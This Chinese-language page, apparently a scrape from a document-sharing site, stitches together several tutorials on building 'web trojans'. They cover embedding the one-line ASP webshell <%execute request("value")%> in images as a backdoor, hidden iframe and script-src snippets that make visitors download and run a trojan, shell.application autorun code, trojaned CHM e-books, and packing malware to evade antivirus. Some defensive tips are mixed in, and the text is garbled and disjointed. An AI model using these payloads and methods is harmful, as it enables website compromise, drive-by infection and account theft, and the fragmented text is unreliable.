网页木马制作全过程(详细)
一句话木马图片制作(三种方法)
一句话木马图片制作(三种方法)-CAL-FENGHAI.-(YICAI)-Company One1图片木马制作的三种方法Copy命令制作1.asp内容:打开cmd,数据一下命令:此时打开两个jpg文件,相比:且打开可以像一样显示图像。
把以下代码放入目标网站,即可按asp执行。
<% #include files=””%>Uedit32(转载):本制作来自于:雪糕。
我们通常在得到webshell之后都想给自己留个后门,等下次或以后有用得到的时候再进来看看。
但如果直接加入一句话木马<%execute request("value")%>到asp文件中时,在该页面上就会有类似如下的错误:Microsoft VBScript 运行时错误错误 '800a000d'类型不匹配: 'execute'/news1/,行 3所以我们就可以开动脑筋了,使用插入一句话木马的图片做我们的后门。
而且我们如果有足够的权限的话(希望网站中的文件可写),就直接把网站原有的图片变成后门,然后在那个asp文件中加入调用图片后门的代码:<!--#include file="图片后门地址"-->这样就没有上面的“类型不匹配: 'execute'”错误了,而且也更好的隐藏了我们的后门。
新挑战始终会伴着新事物的出现而出现,当我们直接将我们的一句话木马的asp文件改成jpg或gif文件的时候,这个图片文件是打不开的,这又容易被管理员发现。
然后我们就又开始思考并寻找新的方法:制作可以显示图片内容的图片格式后门。
制作步骤:一、前期准备材料:1.一张图片:2.一句话木马服务器端代码:<%execute request("value")%>(其他的一句话也行)3.一句Script标签:<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>一句话木马服务器端代码</SCRIPT>4. 调用图片后门代码:<!--#include file="图片地址"-->工具:UltraEdit二、开始制作:1.使用UltraEdit打开文件,然后按CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是3E 25,那么%>就应该是25 3E,但是我们只把25改成00;之后我们在新建一个文本编辑窗口,将我们的script标签代码<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT><%execute request("value")%> </SCRIPT>复制进去,然后点击右键选择十六进制编辑命令,这样会跳转到十六进制数据窗口,复制所有的十六进制的数据,粘贴到的十六进制编辑窗口的最下面,说明:为什么要粘贴到最下面假设你把srcipt标签的十六进制代码粘贴到中间的话,就会破坏图片的完整性,那样下面的图片就看不到了,但是插入的一句话代码还是起作用的。
[]木马实例
![[]木马实例](https://img.taocdn.com/s3/m/38dad4f7534de518964bcf84b9d528ea81c72f47.png)
木马原理
木马组成:
由服务器端程序和客户端程序组成。 服务器端程序安装在被控制对象的计算机
上,客户端程序安装在控制者的计算机上 控制者使用客户端程序控制用户的计算
机,实现对远程计算机的控制 。
2
木马原理
木马特点:
伪装性:伪装成其他程序来迷惑用户 潜伏性:能够毫无声响的打开端口等待外部链
QQ尾巴传播:利用QQ传播木马病毒,称为”QQ尾 巴”或”QQ木马”, 病毒隐藏在用户系统中,发作 时会查找QQ窗口,向在线上的QQ好友发送假消 息,诱惑用户单击网址链接。
早期QQ尾巴在QQ用户发送的消息之后自动附加一段文 字
后期变种会自动检测好友上线,并偷偷自动发送消息
23
网页木马与漏洞
31
木马实例—冰河
3)修改注册表项 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windo ws\CurrentVersion\Runservices
4)处理文件关联 修改HKEY_CLASSES_ROOT\txtfile\shell
\open\command\ 恢复关联项 c:\windows\system32\notepad.exe %1
注册表启动组
HKEY_CURRENT_USER\Software\MICROSOFT\Win dows\CurrentVersion\Explorer\ShellFolder 下的Startup键值,更改启动组路径
17
木马启动方式
修改注册表
注册自启动项
HKEY_LOCAL_MACHINE\Software\Microsoft\Wind ows\currentVersion\Run 注册服务
实验六_网络攻击与防范
《网络攻击与防范》实验报告(2)单击“下一步”按钮·进人如图 4-2 所示的“禁止功能选项”设定界面.根据需要进行设定。
例如。
如果选中“禁止右键菜单”复选框.当运行了该病毒后.右击时将无法弹出快捷菜单。
图 4-2 设置“禁止功能选项”(3)单击“下一步”按钮.进入如图 4-3 所示的“病毒提示对话框”设定界面时。
根据需要设置有关开机时病毒的执行情况。
当选中“设置开机提示对话框”复选框.并设置了提示框标题和内容等后,相关信息将以对话框方式在开机时自动显示图4-3 设置开机时病毒的执行情况(4)单击“下一步”按钮,进入如图 4-4 所示的“病毒传播选项”设定界面,根据需要进行设定。
当选中“通过电子邮件进行自动传播(蠕虫)”复选框时.病毒可以向指定数量的用户发送垃圾邮件。
图4-3 设置开机时病毒的执行情况下一步夏上一步图4-4“病毒传播选项”设定界面(5)单击“下一步”按钮,进入“IE 修改选项”设定界面,根据需要进行设定。
注意.当选中“设置默认主页”复选框后,会弹出“设置主页”对话框,需要读者输人要修改的IE 浏览器主页地址(即每次打开IE 浏览器时默认打开的主页地址).如图 4-5 所示图4-5设置IE浏览器修改选项(6)单击“下一步”按钮,在出现的如图 4-6 所示的对话框中选择所生成的脚本病毒存放的位置,单击“开始制造”按钮,生成病毒文件。
图4-6选择所生成的脚本病毒存放的位置此时,可看到相应路径下,已经生成了脚本病毒文件3.2感染病毒并观察感染后的系统变化情况(1)将生成的脚本病毒文件置于虚拟机中,在其上双击使之运行。
为保证完整准确地查看病毒的感染效果.可重启已经感染了病毒的虚拟机系统。
然后,根据病毒文件生成时的设置,观察系统感染了病毒后的表现情况。
主要操作步骤如下。
(2)观察系统文件夹下的异常变化,可以发现,在 C:\ Windows,C:\Windows\system32下多了不明来源的脚本文件。
网页木马制作
newproject.chm,newproject.hhc ,newproject.hhk ,newproject.hhp 其实最后三个是没用的,删了他把只留一个newproject.chm ,然后把他改任意名上传空间。
test.exe:木马程序。
Байду номын сангаас
上面所说的文件可以修改成任意名字,只是不要忘记把源码里的文件指向也修改就可以了!
最后是设置IIS,打开“程序→管理工具→internet服务管理器”,右键单击要设置的站点,选择《属性》,在选择“http头”。单击“MIME映射”里的“文件类型”按钮,并在关联扩展名文本框中输入“.hta”,在内容类型(MIME)中输入“application/hta",然后关闭所有窗口就可以了。
不过感觉这个方法已经过失了,现在的站长在发现自己的站被挂了木马后,如果主页代码过多,只要搜索iframe就能找到了我们的木马了,一个del,哈哈~~~~玩完了。
所以,下面再介绍几个把。
单独利用chm这个文件来达到盗号目的。假设我们的木马服务端还是为mm.exe然后在他相同目录下建一个mm.htm文件,代码如下
A。安装IE的最新版本并且随时下在才做系统和IE的补丁程序。
B。不随便登陆不熟悉朋友送来的网站,对于熟悉的朋友也要小心哦。
C。不随便登陆黑客网站(^_^黑基除外了啦,我担保的...),色情网站,尤其一些卖外挂,卖木马的网站。
D。不随便打开和预览有附件的邮件。
E。安装防火墙和杀毒软件的最新版本,经常进行升级和查毒
<html><body>
木马运行测试!(这句话可以改成你想说的)
常用工具软件之天网防火墙和木马入侵与清除技术
木马程序的免杀技术
1 2 3 4 木马的脱壳与加壳的免杀 加花指令免杀木马 修改特征代码免杀木马 修改入口点免杀木马
木马的脱壳与加壳的免杀
1.使用ASPack进行加壳 2.使用“北斗压缩”对木马服务端进行多 次加壳 3.使用PE-Scan检测木马是否加过壳 4.使用ASPackdie进行脱壳
使用“北斗压缩”对木马服务端进行多次加壳
使用“北斗压缩”对木马服务端进行多次加壳
使用“北斗程序压缩”给木马服务端进行多次加壳的具体操作步骤如下: 步骤3:在其中勾选相应参数前面的复选框后,选择“文件压缩”选项卡,单击【打 开】按钮,即可打开【选择一个文件】对话框,如图7-73所示。 步骤4:在其中选择一个可执行文件后,单击【打开】按钮,即可开始进行压缩,如 图7-74所示。经过“北斗程序压缩”加壳的木马程序,可以使用ASPack等加壳工 具进行再次加壳,这样就有了两层壳的保护。
伪装成网页
制作网页木马的具体操作步骤如下: 步骤4:单击【生成木马】按钮,即可看到【木马已生成成功】提示框,如图7-12所 示。单击【确定】按钮,即可成功成功生成网页木马。 步骤5:在“动鲨网页木马生成器”目录的“动鲨网页木马”文件夹中将生成 bbs003302.css、bbs003302.gif及index.htm等3个网页木马,其中index.htm是网 站的首页文件,而另外两个是条件文件,如图7-13所示。 步骤6:将生成的三个木马上传到设置存在木马的Web文件夹中,当浏览者一旦打开这 个网页,浏览器就会自动在后台下载指定的木马程序并开始运行了。
使用“北斗程序压缩”给木马服务端进行多次加壳的具体操作步骤如下: 步骤1:先用常见的加壳工具ASPack给某个木马服务端进行加壳,再运行“北斗程序 压缩”软件,即可打开【北斗程序压缩】主窗口,如图7-71所示。 步骤2:选择【配置选项】选项卡,在其中有几个比较重要的参数(处理共享节、最 大程度压缩、使用Windows dll加载器等),如图7-72所示。
CHM电子书木马制作及查杀图文教程
CHM电子书木马制作及查杀图文教程/wojiubaibudu/blog/item/636825fa11294f284f4aeaba.html 2009-09-241.首先需要下载和安装一个QuickCHM软件,并且准备一个chm电子书以及一个木马。
QuickCHM.exe的下载地址:(内含注册码)/space/show/webwin/QuickCHM-0020V2.6.rar/.page2.打开CHM电子书,在电子书第一个页面的右侧右击鼠标,选择“属性”菜单,目的是查询默认文件。
3.在弹出的属性对话框中,你可以发现其默认页面,本例是一张图片:/face.jpg4.点击确定以关闭属性对话框。
然后需要编写一个小小的网页代码,如下图所示,需要改动的地方已在其中注明。
将其保存为.html类型的文件,本例保存为:aaa.html5.接下来对CHM电子书进行反编译,运行QuickCHM软件,选择“文件”→“反编译”菜单项。
6.在弹出的【反编译】对话框中选择“输入”和“输出”文件夹,“输入”框选择电子书路径,“输出”框选择反编译后的文件存储路径(一定要选择已存在的文件夹路径),然后点击“确定”即可自动反编译。
7.反编译完成后会弹出反编译文件夹,找到其中后缀名为.hhp的文件,也就是和电子书名称相同的那个文件本例中是“电子书.hhp”。
8.用记事本打开.hhp文件,如下图:9.在其中添加我们前面编写的网页文件名和木马名,如下图所示,注意和上图比较。
10.将前面编写的网页文件(aaa.html)和木马文件(木马.exe)复制到反编译后的文件夹中。
11.此时需要重新编译。
再次运行QuickCHM软件,选择“文件”→“打开”菜单项,弹出【打开】对话框,选择刚刚修改过的“电子书.hhp”文件,点击“打开”,回到QuickCHM软件主窗口。
12.选择“文件”→“编译”,稍等片刻编译完成,弹出对话框中会显示“完成!你希望运行吗?”的字样选择“否”按钮,此时,已完成了一个chm电子书木马的制作,生成的电子书木马在“反编译文件夹”内。
网马原理大全
网站被挂马,被植入后门,这是管理员们无论如何都无法忍受的。
Web服务器被攻克不算,还“城门失火殃及池鱼”,网站的浏览者也不能幸免。
这无论是对企业的信誉,还是对管理员的技术能力都是沉重的打击。
下面笔者结合实例对网页后门及其网页挂马的技术进行解析,知己知彼,拒绝攻击。
一、前置知识网页后门其实就是一段网页代码,主要以ASP和PHP代码为主。
由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行某些危险的操作,获得某些敏感的技术信息或者通过渗透,提权获得服务器的控制权。
并且这也是攻击者控制服务器的一条通道,比一般的入侵更具有隐蔽性。
网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。
浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机。
二、网页挂马的类型1、框架嵌入式网络挂马网页木马被攻击者利用iframe语句,加载到任意网页中都可执行的挂马形式,是最早也是最有效的的一种网络挂马技术。
通常的挂马代码如下:<iframe src=/muma.html width=0 height=0></iframe>解释:在打开插入该句代码的网页后,就也就打开了/muma.html页面,但是由于它的长和宽都为“0”,所以很难察觉,非常具有隐蔽性。
下面我们做过做个演示,比如在某网页中插入如下代码:<iframe src= width=200 height=200></iframe>在“百度”中嵌入了“IT168安全版块”的页面,效果如图1。
(图1)2、js调用型网页挂马js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术,如:黑客先制作一个.js文件,然后利用js代码调用到挂马的网页。
通常代码如下:<script language=javascript src=/gm.js></script>/gm.js就是一个js脚本文件,通过它调用和执行木马的服务端。
网页挂马
“挂马”攻击已经成为目前最流行的攻击方式,面对数量庞大的“挂马”网站,我们该如何防御呢?作为一名网站站长,我们又如何知道自己的网站被人挂马了呢?站长防范:如果你是一名站长,可以对网站首页以及其他主要页面的源代码进行检查,如用记事本打开这些页面后,以“<iframe>”为关键字进行搜索,找到后可以查看是否是挂马代码。不过碰上有经验的黑客,会编写一段代码将整句挂马代码进行加密,这样我们就很难找到网页中的挂马代码。这时,我们可以使用专门的网页木马检测工具进行检测和清理。
一、挂马的核心:木马
从“挂马”这个词中我们就可以知道,这和木马脱离不了关系。的确,挂马的目的就是将木马传播出去,挂马只是一种手段。挂马使用的木马大致可以分为两类:一类是以远程控制为目的的木马,黑客使用这种木马进行挂马攻击,其目的是为了得到大量的肉鸡,以此对某些网站实施拒绝服务攻击或达到其他目的(目前绝大多数实施拒绝服务攻击的傀儡计算机都是挂马攻击的受害者)。另一类是键盘记录木马,我们通常称其为盗号木马,其目的不言而喻,都是冲着我们的游戏帐号或者银行帐号来的。目前挂马所使用的木马多数属于后者。
普通用户防范:普通用户关心的自然是如何防范“挂马”攻击。既然杀毒软件在网页木马面前成了“睁眼瞎”,而我们又无法感知网站是否被“挂马”。在这种情况下,我们岂不是任人宰割?我们已经知道网页木马的运行原理利用了IE浏览器的漏洞,因此只要我们及时更新系统补丁就可以让网页木马失效了。开启系统“自动更新”的方法为:右键点击“我的电脑”,选择“属性”,切换到“自动更新”标签,选中其中的“自动(推荐)”即可。
在这种情况下,新的网页木马诞生了。这类网页木马通常利用了IE浏览器的漏洞,在运行的时候没有丝毫提示,因此隐蔽性极高。可以说,正是IE浏览器层出不穷的漏洞造成了如今网页木马横行的网络。例如最近的IE浏览器漏洞MS06-014,就可以利用来制作一个绝对隐蔽的网页木马。下面让我们看看利用MS06-014制作网页木马的过程。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
网页木马制作全过程(详细)如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。
这是我一黑客朋友给我说的一句说。
打开该网站的首页,经检查,我确实中了灰鸽子。
怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。
以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。
很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。
一、网页木马的攻击原理首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。
为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。
实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。
下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。
⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace" src="/1.exe"></SCRIPT>小提示:代码说明a. 代码中“src”的属性为程序的网络地址,本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。
b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe 文件,黑客可能变通一下把扩展名exe改为bat或com,这样他们就可以把这些程序上传到服务器上了。
把这段代码插入到网页源代码的</BODY>…</BODY>之间(如图1),然后用没打补丁的IE6打开,接下来,打开IE的临时目录<Temporary Internet Files>,你会发现,在该文件夹中有一个“1.exe”文件,这也就是说,该网页已自动下载了我放置在Web服务器上的灰鸽子木马。
图1 网页木马示例小提示:灰鸽子木马为什么一定要用灰鸽子木马呢?因为灰鸽子是反弹型木马,该木马能绕过天网等大多数防火墙的拦截,中马后,服务端即被控端能主动连接控制端(客户端),也就是说,一旦被控端连接到Internet,在控制端那里,被控端就会“自动上线”(如图2)。
图2 灰鸽子控制短示例(汗!又一大毒枭:))⒉自动运行程序<SCRIPT LANGUAGE="javascript" type="text/javascript"> var shell=newActiveXObject("shell.application");space("c:\\Windows\\").items().item("Notepad.exe").invokeverb(); </SCRIPT>把这段代码插入到网页源代码的</BODY>…</BODY>之间,然后用IE打开该网页,你会发现,这段代码可以在没有打相关补丁的IE6中自动打开记事本。
这段代码使用了shell.application控件,该控件能使网页获得执行权限,替换代码中的“Notepad.exe”(记事本)程序,可以用它自动运行本地电脑上的任意程序。
通过以上的代码我们可以看出,利用IE的漏洞,也就是说在网页中插入适当的代码,IE完全可以自动下载和运行程序,不过,IE一旦打了相关补丁,这些代码就会失去作用。
另外,这些代码要运行和下载程序,有些杀毒软件的网页监控会视它们为病毒,为了逃避追杀,黑客可能会使用一些工具对网页的源代码进行加密处理(如图3)。
图3 加密后的网页代码二、网页木马的基本用法理解了网页木马攻击的原理,我们可以制作自己的网页木马,但这需要你根据IE漏洞写出利用代码。
实际上,在网上有很多高手已写出了一些漏洞的利用代码,有的还把它写成了可视化的程序。
在搜索引擎输入“网页木马生成器”进行搜索,你会发现,在网上有很多利用IE的各种漏洞编写的网页木马生成器,它们大都为可视化的程序,只要你有一个木马(该木马必须把它放置到网络上),利用这些生成器你就可以立即生成一个网页,该网页就是网页木马,只要他人打开这个网页,该网页就可以自动完成下载木马并运行(安装)木马的过程。
在我的电脑上我已下载了一个网页木马生成器,下面我们来看怎么生成网页木马并让他人中木马。
第一步:启动该网页木马生成器,如图4所示,在文本框中输入木马的网络地址,最后单击“生成”。
图4 网页木马生成器第二步:在网页木马生成器的安装文件夹会生成一个网页文件,该文件就是我们在上一步生成的网页木马。
上传该文件到自己的Web服务器或免费主面空间。
现在好了,把上述网页在服务器上的地址(网址)通过QQ发给自己的好友,一旦他访问了该网页,该网页就会在他的电脑上自动下载并运行你放置在网络上的木马。
现在你该明白安全专家劝告的“不要打开陌生人发来的网络地址”这句话的真谛了吧!实际上,即使人人都不打开陌生人发来的网址,也仍然有一些人“飞蛾补灯,自寻死路”,因为若大的Internet,总会有一些人会有意或无意地访问这些网址,而且,有些网页木马,还挂在一些知名网站上(根据知名网站的访问量,你算算吧,每天有多少人中了木马!)。
小提示:你可能还没想到,看电影,在论坛查看或回复帖子也能中木马。
实际上,网页木马还可以挂在多媒体文件、电子邮件、论坛、CHM电子书上,这样,用户一旦观看电影、查看或预览邮件(主要是一些用电子邮件群发器发送的垃圾邮件)、参与帖子,打开电子书,用户就会中网页木马。
在下面我们只介绍黑客如何在知名网站上挂网页木马。
下面来看这一段代码:iframesrc="/hk.htm" width="0" height="0" frameborder="0"></iframe>小提示:“src”的属性“/hk.htm”是上传到服务器上的网页木马的网址。
把这段代码插入到某门户网站首页源代码的</BODY>…</BODY>之间,从表面上看,插入后该门户的首页并没有什么变化,但是,所有访问了该门户网站首页的人都会中木马,为什么会这样呢?这是因为这段代码中<iframe>标签把网页木马网页隐藏性地“包含”在了插入代码的网页当中。
<iframe>也叫浮动帧标签,它可以把一个HTML网页嵌入到另一个网页里实现“画中画”的效果(如图5),被嵌入的网页可以控制宽、高以及边框大小和是否出现滚动条等。
在上代代码中,因为把宽(width)、高(height)、边框(frameborder)都设置为了“0”,所以,上述代码插入到门户网站的首页后,网站的首页不会发生变化,但是,由于嵌入的网页实际上已经打开了,所以网页上的下载木马和运行木马的脚本还是会随着门户首页的打开而执行的。
图5 iframe标签示例也许有人会问,如何把上述代码插入到门户网站首页的源代码中?这个问题问得好,本人才疏学浅,确实无法进入他们的服务器修改网页,但是黑客如果发现了这些服务器上的漏洞且获得了webshell权限,那么修改他们的网页就跟在本地制作一个网页一样容易。
有人还问,拿到服务器的webshell权限容易吗?如果你对网络安全比较关注,你会发现,经常有这个网站被黑了,那个网站的主页被修改了的新闻爆出。
有人还问,门户的服务器几乎无漏洞可找,个人服务器的漏洞较多,你能进入吗?本人不是黑客,中华人民共和国的法律规定,入侵和篡改他人服务器上的信息是违法行为,希望大家共同维护网络安全。
以前,在网上打开一些有名的网站时杀毒软件也会报警,现在你明白其中的道理了吧。
有些人在这些网站发帖子骂娘,看了本文,希望在骂娘时你也能为那些垫背的站长想想。
三:网页木马的防范策略网页木马的防范只靠杀毒软件和防火墙是远远不够的,因为一旦黑客使用了反弹端口的个人版木马(个人反汇编的一些杀毒软件无法识别的木马),那么杀毒软件和防火墙就无可奈何,所以,网页木马的防范要从它的原理入手,从根子上进行防范。
㈠即时安装安全补丁网页木马都是利用IE漏洞进行传播的,我们拿冰狐浪子的网页木马(用“冰狐浪子网页木马生成器”制作的网页木马)来说吧,该网页能绕过IE的安全设置,当用户连接到该网页时,它能在普通用户不知情的情况下在后台下载一个木马并运行(安装)该木马。
所以,经常到微软网站去下载并安装最新的安全补丁是防范网页木马比较有效的办法。
㈡改名或卸载(反注册)最不安全的ActiveXObject(IE插件)在系统中有些ActiveXObject会运行EXE程序,比如本文中“自动运行程序”代码中的Shell.application控件,这些控件一旦在网页中获得了执行权限,那么它就会变为木马运行的“温床”,所以把这些控件改名或卸载能彻底防范利用这些控件的网页木马。
但是ActiveXObject是为了应用而出现的,而不是为了攻击而出现的,所有的控件都有它的用处,所以在改名或卸载一个控件之前,你必须确认这个控件是你不需要的,或者即使卸载了也不关大体的。
⒈卸载(反注册)ActiveXObject第一步:在“开始”菜单上单击“运行”,输入“CMD”命令打开命令提示符窗口。
第二步:在命令提示符下输入“regsvr32.exe shell32.dll /u/s”,然后回车就能将Shell.application控件卸载。
如果日后我们希望继续使用这个控件的话,可以在命令提示符窗口中输入“regsvr32.exeshell32.dll /i/s”命令将它们重新安装(注册)。
在上述命令中:“regsvr32.exe”是注册或反注册OLE 对象或控件的命令,[/u]是反注册参数,[/s]是寂静模式参数,[/I]为安装参数。